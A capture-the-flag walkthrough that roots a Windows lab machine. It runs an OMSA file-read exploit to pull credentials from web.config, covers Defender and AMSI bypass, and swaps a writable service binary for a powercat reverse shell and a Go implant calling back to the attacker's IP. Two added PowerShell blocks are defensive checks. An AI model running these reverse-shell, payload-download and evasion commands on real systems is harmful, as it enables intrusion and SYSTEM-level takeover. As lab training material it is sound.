Hack Smarter Security
Can you hack the hackers?
This work by Manav G Krishna is licensed under CC BY-NC 4.0
Machine IP: 10.10.112.96
Nmap Scan:
nmap -p- -A -v --min-rate 100 -oN hacksmartersecurity_thm -Pn 10.10.112.96
Nmap scan report for 10.10.112.96
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HackSmarterSec
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Issuer: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-30T19:03:17
| Not valid after: 2025-06-29T19:03:17
| MD5: 4276:b53d:a8ab:fa7c:10c0:1535:ff41:2928
|_SHA-1: c44f:51f8:ed54:802f:bb94:d0ea:705d:50f8:fd96:f49f
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Sat, 16 Mar 2024 06:17:01 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
| <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| HTTPOptions:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Sat, 16 Mar 2024 06:17:07 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
|_ <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-16T06:17:37+00:00
|_ssl-date: 2024-03-16T06:17:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=hacksmartersec
| Issuer: commonName=hacksmartersec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-15T06:03:53
| Not valid after: 2024-09-14T06:03:53
| MD5: 8383:3da2:bc78:7d18:98f9:aaf9:d5b0:c626
|_SHA-1: 2012:fcc6:d0ef:d9db:67f0:e3c9:8554:6dfa:26c0:68dd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 153.05 ms 10.11.0.1
2 153.20 ms 10.10.112.96
From the scan we straight away notice that anonymous FTP login is allowed, and the directory listing is shown as well.
Connecting to the FTP Server:
Command:
ftp 10.10.112.96

We can connect with the name anonymous; the password can be left empty, or we can use anonymous as well.
Downloading the files from the server:

We notice that stolen-passport.png didn't get transferred correctly. This is because image files are stored in binary format, while ASCII mode is the default on the majority of FTP servers and it rewrites line-ending bytes in transit; to transfer image files without corruption we switch to binary mode.
Switching to Binary mode:
Now the .png file has downloaded successfully.
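As an added check that is not part of the original writeup, the PowerShell function below (it also runs under pwsh on Linux) reads the first eight bytes of a downloaded file and reports whether the PNG signature is intact or shows the line-ending rewrite an ASCII-mode transfer causes; the file path at the end is only a placeholder.

```powershell
# Added example, not from the writeup: detect ASCII-mode FTP corruption of a PNG.
# The PNG signature is 89 50 4E 47 0D 0A 1A 0A; the CR LF pair and the trailing bare LF
# were put there precisely so that line-ending translation is visible in the header alone.
function Test-PngTransfer {
    param([Parameter(Mandatory)][string]$Path)

    $expected = [byte[]](0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt 8) { return 'Too short to carry a PNG signature' }
    $head = $bytes[0..7]

    if (($head -join ',') -eq ($expected -join ',')) {
        return 'OK: intact PNG signature (binary-mode transfer)'
    }
    # CR LF collapsed to LF, so the header reads 89 50 4E 47 0A 1A 0A ...
    if ($head[4] -eq 0x0A -and $head[5] -eq 0x1A) {
        return 'CORRUPT: CR LF collapsed to LF, typical of an ASCII-mode download to a Unix client'
    }
    # Bare LF expanded to CR LF, so the header reads 89 50 4E 47 0D 0A 1A 0D 0A ...
    if ($head[6] -eq 0x1A -and $head[7] -eq 0x0D) {
        return 'CORRUPT: LF expanded to CR LF, typical of an ASCII-mode transfer toward Windows'
    }
    return 'Not a PNG signature at all'
}

# Placeholder path: compare the result before and after re-downloading in binary mode.
Test-PngTransfer -Path '.\stolen-passport.png'
```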
Checking out the files:
The first file, Credit-Cards-We-Pwned.txt, has some credit card information:
There are more lines in that file in a similar fashion.
The second file, stolen-passport.png:
We can run exiftool to see if we get some metadata from the image:
Command:
exiftool stolen-passport.png
No good information in here.
Checking out port 80:
We can see what Wappalyzer tells us:
We now know that the web server running is IIS.
We have a contact form here:
Testing out a basic XSS payload:
Now let's set up a netcat listener on port 80. If the above payload works we should get a connection back on our listener, which shows that the server has reached out to our machine. The IP specified in the payload is the tun0 interface IP.
Unfortunately we don't get any connection on the listener.
We can now do some directory busting to see if we get any juicy paths:
Command:
feroxbuster -u http://10.10.112.96
Nothing interesting here either.
Checking out port 1311:
SpeedGuide tells us that this port is used by Dell OpenManage HTTPS.
Upon googling "port 1311 vulnerability", we come across this result from Tenable:
Let's keep this aside for now and check out the website:
The certificate didn't have much in it.
We are presented with a Dell OpenManage Server Administrator (OMSA) login page. Dell EMC OpenManage Enterprise is a unified systems management console designed to take complexity out of the IT administration experience.
Note: Accessing the port over HTTP gave us this: Bad Request This combination of host and port requires TLS. This shows that we had to access it via HTTPS, which is what we had done.
The details in the Tenable research blog match what we see on the login page; we have the exact dialog boxes mentioned in the blog. It is a CVE, and the description says: An unauthenticated remote attacker can login to OMSA as admin without knowing a correct OS username and password on that system.
This indeed sounds juicy, let's give it a try.
Following the POC:
But this didn't work as expected; it gave us a Login failed error:
Moving on.
We notice there is an About section. Let us check it out:
And now we have the version: 9.4.0.2
Note: The About page does take some time to load, so just wait it out.
Now let us use this version to find exploits.
Upon googling "dellemc 9.4.0.2 exploits" we get this result from Rhino Security Labs:
It is a file read vulnerability in Dell OpenManage Server Administrator (OMSA).
The blog explains the vulnerability really well and there is also a POC in there:
Usage:
Command:
python3 exploit.py 10.11.75.84 10.10.112.96:1311
We know from before that the web server running is IIS, and from the Nmap scan we can see that ports 22 (SSH) and 3389 (RDP) are open. Keeping all this in mind, the main file that we could try to read is the web.config file. It is an XML file containing the rules for a particular site (or directory) on a web server, and it is located within C:\inetpub\wwwroot, the default root directory for websites hosted on IIS.
In our case the name of the website hosted on the IIS web server is hacksmartersec. We can see this in the Nmap scan under the port 1311 information (commonName=hacksmartersec).
The exact location: C:\inetpub\wwwroot\hacksmartersec\web.config
Let us read this file now:

We can see that we have a password for the username tyler.
We can now SSH in as this user:
Command:
ssh tyler@10.10.112.96
We can find the user flag in the Desktop folder of tyler.
Checking if we are part of any interesting groups or if we have any juicy privileges:
Command:
whoami /all
There is nothing of interest.
Checking if Defender is active:
Command:
sc query WinDefend
And yes, we can see that the STATE is RUNNING.
We can still try to execute scripts like winPEAS.ps1, PrivescCheck.ps1 etc. to find vulnerabilities, if any.
Also, tyler has Full Control (F) on the Desktop folder:
Command:
icacls .
Full Control (F) is the highest level of permission that can be granted to a user or group in a Windows security context. When a user or group is assigned Full Control, they have complete control over the object to which the permissions apply.
So we can put our scripts in the Desktop folder.
Executing winPEAS.ps1:
Upon trying to run the script after sending it via wget (after setting up a python server on port 4545 with python3 -m http.server 4545), Defender flagged it as a virus. Any port can be used to serve the file.
Command:
wget http://10.11.75.84:4545/winpeas.ps1 -o winpeas.ps1
We can now try an AMSI bypass. For more information check this out:
The script now starts running without any issues.
Note: Running WinPEAS was taking so much time and it wasn't giving me any good information. I then decided to switch to PrivescCheck. Also, the .exe of WinPEAS and a few other scripts that I tested were getting flagged even after running the command that could bypass AMSI. I have shown only the ones that worked for me in this writeup.
Executing PrivescCheck.ps1:
When trying to run it, it ran without any issues and wasn't flagged by Defender. This is one of the few scripts that usually don't get flagged. This time I set up a python server on port 4646.
Command:
wget http://10.11.75.84:4646/PrivescCheck.ps1 -o PrivescCheck.ps1
Command:
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML
Now we just wait for it to find something worthy that could help us in rooting the machine.
It has found a vulnerability rated High that lets us escalate privileges, as this service is running under the SYSTEM account and we can start and stop the service:
Name : spoofer-scheduler
ImagePath : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Spoofer
IdentityReference : BUILTIN\Users
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes, DeleteChild, Traverse
Status : Running
UserCanStart : True
UserCanStop : True
Explanation:
Name: Indicates the name of the service or process, which in this case is spoofer-scheduler.
ImagePath: Specifies the path to the executable file (spoofer-scheduler.exe) associated with the service. It's located in the directory C:\Program Files (x86)\Spoofer.
User: Indicates the user account under which the service is running. In this case, it's running under the LocalSystem account, which is a built-in Windows account with high privileges.
ModifiablePath: Specifies the path where the service's files and configurations are stored. In this case, it's the directory C:\Program Files (x86)\Spoofer.
IdentityReference: Specifies the security principal or group that has permissions to access or manage the service. In this case, it's the Users group (BUILTIN\Users).
Permissions: Lists the specific permissions granted to the Users group for this service. These permissions include WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ListDirectory, AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, AddFile, ReadExtendedAttributes, DeleteChild, and Traverse.
Status: Indicates the current status of the service. In this case, it's Running, meaning the service is currently running.
UserCanStart: Specifies whether users have permission to start the service. It's set to True, indicating that users can start the service.
UserCanStop: Specifies whether users have permission to stop the service. It's also set to True, indicating that users can stop the service.
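As an added, read-only audit (not code from the writeup or from PrivescCheck), the PowerShell script below lists every service whose binary directory grants write-type rights to a low-privileged principal, which is the condition reported above for spoofer-scheduler. It checks directory ACLs only, not the service's own start/stop ACL; the principal names and the icacls remediation at the end assume a standard English Windows install.

```powershell
# Added example, not from the writeup or from PrivescCheck: find services whose binary
# directory can be modified by low-privileged principals. Run as an administrator on the
# host being assessed; it changes nothing.

$LowPrivPrincipals = @(
    'BUILTIN\Users', 'Everyone',
    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights on the directory lets a user swap or alter the service binary.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership, FullControl'

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service.PathName, whether quoted or not.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted path with possible arguments: assume the binary ends at the first ".exe".
    $m = [regex]::Match($PathName, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split ' ')[0]
}

function Find-WritableServiceDirectory {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe) { continue }
        $dir = Split-Path -Path $exe -Parent
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band [int]$WriteRights) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName      # LocalSystem means a swapped binary runs as SYSTEM
                State     = $svc.State
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceDirectory | Format-Table -AutoSize

# Remediation for a confirmed finding (elevated prompt, after checking the vendor's own
# requirements): drop inherited ACEs and leave Users with read/execute only.
#   icacls "C:\Program Files (x86)\Spoofer" /inheritance:r /grant:r "NT AUTHORITY\SYSTEM:(OI)(CI)F" "BUILTIN\Administrators:(OI)(CI)F" "BUILTIN\Users:(OI)(CI)RX"
```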
Privilege Escalation to SYSTEM:
Firstly let us get into the folder where spoofer-scheduler.exe is located:
From the PrivescCheck output we know that the service spoofer-scheduler is currently running.
Thinking Process:
Since we know the service is running under the SYSTEM account and that we have Write permissions on the folder where spoofer-scheduler.exe is located (based on the PrivescCheck output), we can remove that binary and replace it with our reverse shell binary of the same name. Since the service is currently running, we have to stop it first to remove the file; once the file is replaced and the service started again, we should get a shell as SYSTEM.
Confirming that we can write into the folder:
Command:
icacls .
The user we have a hold on, tyler, is (if we recollect) part of the BUILTIN\Users group; members of this group have Full Control (F) on the Spoofer folder where the binary is located, and users belonging to this group can also manage the service.
Stopping the spoofer-scheduler service:
Command:
Stop-Service -Name "spoofer-scheduler"
Confirming the same:
Command:
Get-Service -Name "spoofer-scheduler"
We can see that the Status is Stopped.
Now we can remove the original spoofer-scheduler.exe:
Command:
rm spoofer-scheduler.exe
Now we can make use of a tool called powercat for the shell:
Command:
powercat -c 10.11.75.84 -p 4444 -e cmd -g > test.ps1
This generates a reverse shell as a PowerShell script.
The script has to be converted to .exe format. To do this we will be using this online tool:
Now we send the spoofer-scheduler.exe containing the shell to the machine. The python server being used to serve the file is the one on port 4545:
Command:
wget http://10.11.75.84:4545/spoofer-scheduler.exe -o spoofer-scheduler.exe
Setting up a netcat listener on port 4444:
Command:
nc -lnvp 4444
Starting the spoofer-scheduler service:
Command:
Start-Service -Name "spoofer-scheduler"
Let us go back and check our listener:
We have successfully got a shell as SYSTEM. The shell will die pretty soon here: the replaced binary never reports back to the Service Control Manager the way a real service does, so the service start times out and the process is terminated.
The last answer can be found at this path:
C:\Users\Administrator\Desktop\Hacking-Targets\hacking-targets.txt
Note: Now I will show another script or method that I used to bypass Defender to get a SYSTEM shell which doesn't die.
Go Script to Bypass Defender:
We have to firstly clone the repo:
Command:
git clone https://github.com/daniellowrie/update_script
Once that is done, we can start getting it working:
Command:
go run SecUp.go 10.11.75.84
This starts the main engine: it generates the payload (the implant) along with a few other files that it needs to function as intended, and it also sets up an HTTP server to serve the needed files:
Out of the attack files that it generates, update_script.go is the payload file. It also sets the listening port to 443 by default, which helps in evading whatever detections are in place most of the time.
So we set up a netcat listener on port 443:
Command:
nc -lnvp 443
Compiling the .go file to an .exe file:
Command:
GOOS=windows go build update_script.go
This generates a file named update_script.exe:
Now we have to rename update_script.exe to spoofer-scheduler.exe, as that was the binary in question based on the PrivescCheck output:
This file must now be served or sent to the machine. This time I set up a python server on port 4848. Before we send the file we have to start the spoofer-scheduler service, which is stopped at the moment (apparently, since starting it triggered the shell previously, the service was actually in the STOPPED state after the shell died). Since spoofer-scheduler.exe is already present on the machine from what we did when using powercat, it must be removed and replaced with the new one.
Command:
wget http://10.11.75.84:4848/spoofer-scheduler.exe -o spoofer-scheduler.exe
Starting the spoofer-scheduler service:
Let us now start the service. For starting the service in PowerShell, check the command mentioned in the Privilege Escalation section.
We can also start it in cmd like this:
Command:
sc start spoofer-scheduler
The moment we start it, we can see the files that the Go script needs being served from the HTTP server that the script had set up initially:
Checking out our listener:
Yet again we have a SYSTEM shell. This shell doesn't die like the powercat shell did. The Nim shell that I mention below also died soon.
Another way to root this machine is by using a reverse shell written in Nim that goes undetected by Defender, like how powercat and the payload generated by the Go script went through without getting removed. Tyler himself has made a video on this, do check that out:
Room solved!!